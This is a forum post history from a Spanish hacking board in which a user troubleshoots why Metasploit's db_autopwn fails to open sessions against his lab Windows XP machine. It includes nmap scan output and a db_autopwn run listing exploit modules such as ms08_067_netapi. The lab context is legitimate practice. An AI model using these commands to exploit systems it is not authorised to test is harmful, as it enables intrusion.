elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13]
121  Seguridad Informática / Hacking / Re: db_autopwn funciona? en: 23 Abril 2010, 22:47 pm
vaya con el fast-track me vais a convencer para probarlo, coincido contigo es una tecnica lammer yo tambien prefiero hacerlo manualmente pero si no funciona manualmente pues como segunda opcion es perfecta bueno voy a arrancar el backtrack y a probar el fast-track gracias a todos de todas formas si alguien tiene una solucion para el tema principal que me lo haga saber please
122  Seguridad Informática / Hacking / Re: db_autopwn funciona? en: 23 Abril 2010, 22:35 pm
Si estoy conectado a una red privada lo daba por sabido lo siento, también me conecto con wifi(wlan0) aqui tienes mi nmap:
Código:
dazoverride@xxx:~$ sudo nmap -sP 192.168.2.0/24
[sudo] password for dazoverride:

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:09 CEST
Nmap scan report for 192.168.2.1 --> router
Host is up (0.0021s latency).
Nmap scan report for 192.168.2.2 --> pc de sobremesa ubuntu
Host is up (0.0042s latency).
Nmap scan report for 192.168.2.4 -->pc_atacante(ubuntu)
Host is up.
Nmap scan report for 192.168.2.5 --> pc_victima(windows_xp con vulnerabilidad windows/smb/ms08_067_netapi
Host is up (0.00057s latency).
como e dicho antes ahora lo que haria es abrir el msfconsole y:
Código:
msf > db_create prueba
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: prueba
msf > db_connect prueba
[*] Successfully connected to the database
[*] File: prueba
msf > db_nmap -n -sT -PN 192.168.2.5

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:21 CEST
Nmap scan report for 192.168.2.5
Host is up (0.010s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-term-serv
31337/tcp open  Elite

Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds

msf > db_autopwn -t -p -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*]
[*] ===============================================================
[*]                             Matching Exploit Modules
[*] ===============================================================
[*]   192.168.2.5:139  exploit/windows/smb/ms08_067_netapi  (port match)
(he quitado los demás para ahorrar espacio)
===============================================================
[*]
[*]
[*] (1/43 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.5:135...
[*] (2/43 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.2.5:139...
.........
[*] (18/43 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.2.5:139...
.........
[*] (42/43 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Waiting on 15 launched modules to finish execution...
[*] (43/43 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions


de todas formas lo que mas me sorprende es que me entre al pc victima cuando lo exploto manualmente con el exploit windows/smb/ms08_067_netapi y luego cuando utilizo el db_autopwn vea pasar el exploit como si estuviera intentando explotar el servicio y las sessions siguen a 0. Ademas tambien he probado lo de importar el scan del nessus correctamente incluso veia las vulnerabilidades con el comando db_vulns del metasploit y ejecute la opcion -x del db_autopwn y nada....

Por cierto lo del fast-track enseguida lo pruebo y os informo.
123  Seguridad Informática / Hacking / db_autopwn funciona? en: 22 Abril 2010, 20:11 pm
Hola tengo una duda, he investigado sobre el comando db_autopwn de metasploit framework 3.3 y parece que corre pero no me crea sesiones, en cambio lo ago manualmente (exploto con el simple windows/smb/ms08_067_netapi) y funciona a la perfección.

mis pasos son:
1-creo la base de datos en sqlite3
2-luego con db_nmap -n -sL -PN 192.168.1.5 en este caso una maquina virtual windows XP vulnerable al exploit windows/smb/ms08_067_netapi
3-db_ autopwn -t -p -e  tambien e probado la opcion -r para que sea una conexion reverse.

vale ahora empieza a comprobar y tal pero no me crea session meterpretetr incluso cuando comprueba con el exploit vulnerable el cual es visible en la consola.

se les ocurre algo que e hecho mal? si lo necesitan os enviaré screenshots que ahora estoy en clase y no tengo tiempo :P

gracias de antemano.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines